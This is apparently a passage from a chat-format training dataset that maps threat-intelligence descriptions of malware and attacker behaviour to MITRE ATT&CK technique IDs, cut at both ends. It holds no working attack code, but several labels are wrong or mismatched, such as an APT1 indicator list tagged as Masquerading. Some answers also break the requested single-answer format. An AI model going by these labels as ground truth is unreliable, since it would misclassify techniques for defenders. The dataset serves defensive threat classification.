"role": "assistant", "content": "T1547.013 - XDG Autostart Entries" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mustang Panda has downloaded additional executables following the initial infection stage." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mis-Type has downloaded additional malware and files onto a compromised host." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "copied all targeted files to a directory called index that was eventually uploaded to the C&C server." }, { "role": "assistant", "content": "T1074 - Data Staged" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "checks for processes associated with anti-virus vendors." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Use of obfuscated shellcode executed via PowerShell to download a \"reverse_tcp\" payload from Metasploit onto victim systems" }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cardinal RAT injects into a newly spawned process created from a native Windows executable." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This field contains a URL that the Trojan will use to upload the contents of the .txt file, which will be structured as . where the process ID is encoded with the same character substitution function as seen previously in Table 4" }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used Meterpreter to enumerate users on remote systems." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Conclusion Tick has left a trail of evidence indicating that its activity began as early as 2006. In earlier attacks, the group used malicious Microsoft Word documents to infect victims, with compromised websites being added to the mix as a more recent attack vector" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Helminth implant is routinely delivered through macro-enabled Microsoft Office documents requiring user interaction to execute an obfuscated Visual Basic Script" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware next sets out to prevent the victim from stopping the ongoing infection. First, the machine is removed from the Active Directory domain by using WinAPI or WMI. This makes it harder to remotely push any remediation tools to the infected machines" }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Conficker has used a DGA that seeds with the current UTC victim system date to generate domains." }, { "role": "assistant", "content": "T1568.002 - Domain Generation Algorithms" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ryuk has called \"GetLogicalDrives\" to emumerate all mounted drives, and \"GetDriveTypeW\" to determine the drive type." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DCSrv has created Registry keys for persistence." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Analysis of the F.bmp image revealed that it is indeed using Least Significant Bit (LSB) Steganography [9,10], a commonly used form of steganography that embeds data in an image without significantly affecting its appearance" }, { "role": "assistant", "content": "T1001.002 - Data Obfuscation via Steganography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Since 2014, Inception has widened its use of cloud service providers for C&C purposes. Whereas previously it relied on one service provider (CloudMe.com), more recently it has employed a least five cloud service providers" }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chimera has remotely copied tools and malware onto targeted systems." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This function will either bind the calling process to a port or has the calling process connect to a remote host. The function is called in the following manner" }, { "role": "assistant", "content": "T1134.002 - Create Process with Token" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Milan can query `HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography MachineGuid` to retrieve the machine GUID." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SodaMaster can enumerate the host name and OS version on a target system." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoetRAT has the ability to gather information about the compromised host." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Emotet has been seen exfiltrating system information stored within cookies sent within an HTTP GET request back to its C2 servers." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Nebulae can list files and directories on a compromised host." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The value is derived using the IOService to access the IOPlatformUUID property, which is equivalent to the “Hardware UUID” listed in the system information application, as seen in the Figure 3 screenshot of our analysis system" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Emissary has the capability to execute the command \"net localgroup administrators\"." }, { "role": "assistant", "content": "T1069.001 - Permission Groups Discovery: Local Groups" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PLAINTEE gains persistence by adding the Registry key \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "configures itself as a service." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TrickBot can identify the user and groups the user belongs to on a compromised host." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Higaisa used a function to gather the current time." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobian RAT obfuscates communications with the C2 server using Base64 encoding." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Drovorub can exfiltrate files over C2 infrastructure." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BoomBox can upload data to dedicated per-victim folders in Dropbox." }, { "role": "assistant", "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A version of KONNI searches for filenames created with a previous version of the malware, suggesting different versions targeted the same victims and the versions may work together." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "used spearphishing with PDF attachments containing malicious links that redirected to credential harvesting websites." }, { "role": "assistant", "content": "T1598.003 - Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "At line 40, that data is piped through the base64 utility for decoding, dropped in a subfolder in the /tmp directory, given executable permissions via chmod, and then launched as the 2nd stage payload" }, { "role": "assistant", "content": "T1222.002 - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is capable of using HTTP, HTTPS, SMTP, and DNS for C2." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QuasarRAT can determine the country a victim host is located in." }, { "role": "assistant", "content": "T1614 - System Location Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The LNK file is moved to the startup directory" }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN7 lured victims to double-click on images in the attachments they sent which would then execute the hidden LNK file." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hildegard has deleted scripts after execution." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "dir c:\\" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Freenki is used to gather information about the infected system and to download a subsequent stage payload" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Metamorfo has used HTTP for C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Disttrack uses the internal domain names and credentials to log into remote systems on the same network segment" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a plugin that can perform ARP scanning as well as port scanning." }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Notably, one of the tools used in the attack exploited the CVE 2021 21551 vulnerability in a Dell driver in what was the first recorded abuse of this security flaw." }, { "role": "assistant", "content": "T1211 - Exploitation for Defense Evasion', 'T1190 - Exploit Public-Facing Application', 'T1588.006 - Vulnerabilities" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once the second DLL is executed, it gathers information about the victim system’s setup, such as operating system version, and driver and processor information" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bankshot decodes embedded XOR strings." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 used the \"net view\" command to show all shares available, including the administrative shares such as \"C$\" and \"ADMIN$\"." }, { "role": "assistant", "content": "T1135 - Network Share Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BITTER has encrypted their C2 communications." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BackdoorDiplomacy has dropped implants in folders named for legitimate software." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mosquito uses the \"ipconfig\" command." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The ANCHOR backdoor has been seen across a subset of intrusions associated with this activity and can often be identified via the scheduled tasks it uses to maintain persistence through reboot. The scheduled tasks created by ANCHOR are often unnamed, although that is not always the case" }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DnsSystem can download files to compromised systems after receiving a command with the string `downloaddd`." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This DLL serves three main functions: killing antimalware, unpacking and executing the main RAT DLL, and obtaining persistence" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During a file analysis of PLAINTEE in WildFire, we observed the attackers download and execute a plugin during the runtime for that sample" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QAKBOT has gained execution through users opening malicious attachments" }, { "role": "assistant", "content": "T1204 - User Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kazuar can accept multiple URLs for C2 servers." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Proxysvc appears to be a downloader whose primary capability is to deliver additional payloads to the endpoint without divulging the control address of the attackers. This implant is a service DLL that can also run as a standalone process" }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gelsemium has named malicious binaries `serv.exe`, `winprint.dll`, and `chrome_elf.dll` and has set its persistence in the Registry with the key value \"Chrome Update\" to appear legitimate." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WannaCry scans its local network segment for remote systems to try to exploit and copy itself to." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Assuming the lists of credentials are valid, the mass collection confirms our hypothesis that the OilRig group maintains a heavy emphasis on credential based attacks along with the other types of attacks they deploy" }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GuLoader has the ability to inject shellcode into a donor processes that is started in a suspended state. GuLoader has previously used RegAsm as a donor process." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "injects itself into various processes depending on whether it is low integrity or high integrity." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bankshot deletes all artifacts associated with the malware from the infected machine." }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "searches for files named logins.json to parse for credentials and also looks for credentials stored from browsers." }, { "role": "assistant", "content": "T1552.001 - Unsecured Credentials: Credentials In Files" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "(Source: SecureWorks) Reentry attempt After BRONZE UNION was evicted from a compromised environment, which involved blocking the group's known infrastructure, CTU researchers observed the group attempting to reconnect to its OWA web shells and a backup web shell it had deployed during the intrusion" }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "collected complete contents of the 'Pictures' folder from compromised Windows systems." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Patchwork dumped the login data database from \"\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data\"." }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BADNEWS is sometimes signed with an invalid Authenticode certificate in an apparent effort to make it look more legitimate." }, { "role": "assistant", "content": "T1036.001 - Invalid Code Signature" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Crimson can exfiltrate stolen information over its C2." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TinyTurla can go through a list of C2 server IPs and will try to register with each until one responds." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Machete created their own directories to drop files into." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Finally, it creates and runs a shell script at /tmp/.server.sh, which also establishes a reverse shell" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1059.004 - Command and Scripting Interpreter: Bash" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During execution, malware deobfuscates and decompresses code that was encoded with Metasploit’s shikata_ga_nai encoder as well as compressed with LZNT1 compression." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN7 has attempted to run Darkside ransomware with the filename sleep.exe." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "StreamEx uses rundll32 to call an exported function." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PowerLess can encrypt browser database files prior to exfiltration." }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Conclusion The DarkHydrus group carried out an attack campaign on at least one government agency in the Middle East using malicious .iqy files. The .iqy files take advantage of Excel's willingness to download and include the contents from a remote server in a spreadsheet. DarkHydrus leveraged this obscure file format to run a command to ultimately install a PowerShell scripts to gain backdoor access to the system. The PowerShell backdoor delivered in this current attack may have been custom developed by the threat group, however, it is possible that DarkHydrus pieced together this tool by using code from legitimate open source tools" }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Machete's collected data is exfiltrated over the same channel used for C2." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kazuar adds a sub-key under several Registry run keys." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Digital delivery of over 3,000 APT1 indicators, such as domain names, and MD5 hashes of malware. Thirteen (13) X.509 encryption certificates used by APT1. A set of APT1 Indicators of Compromise (IOCs) and detailed descriptions of over 40 malware families in APT1's arsenal of digital weapons. IOCs that can be used in conjunction with Redline™, Mandiant's free host-based investigative tool, or with Mandiant Intelligent Response® (MIR), Mandiant's commercial enterprise investigative tool" }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lizar can support encrypted communications between the client and server." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses a batch file to load a DLL into the svchost.exe process." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "used command line for execution." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Wizard Spider has used file deletion to remove some modules and configurations from an infected host after use." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The macro saves the chkSrv.vbs script to the system, which is responsible for running the IntelSecurityAssistManager.exe payload (OopsIE Trojan) and cleaning up the installation by deleting the two scheduled tasks, the Base.txt file, the ThreeDollars document, and the chkSrv.vbs script" }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Volgmer queries the system to identify existing services." }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Emotet has been observed adding the downloaded payload to the \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" key to 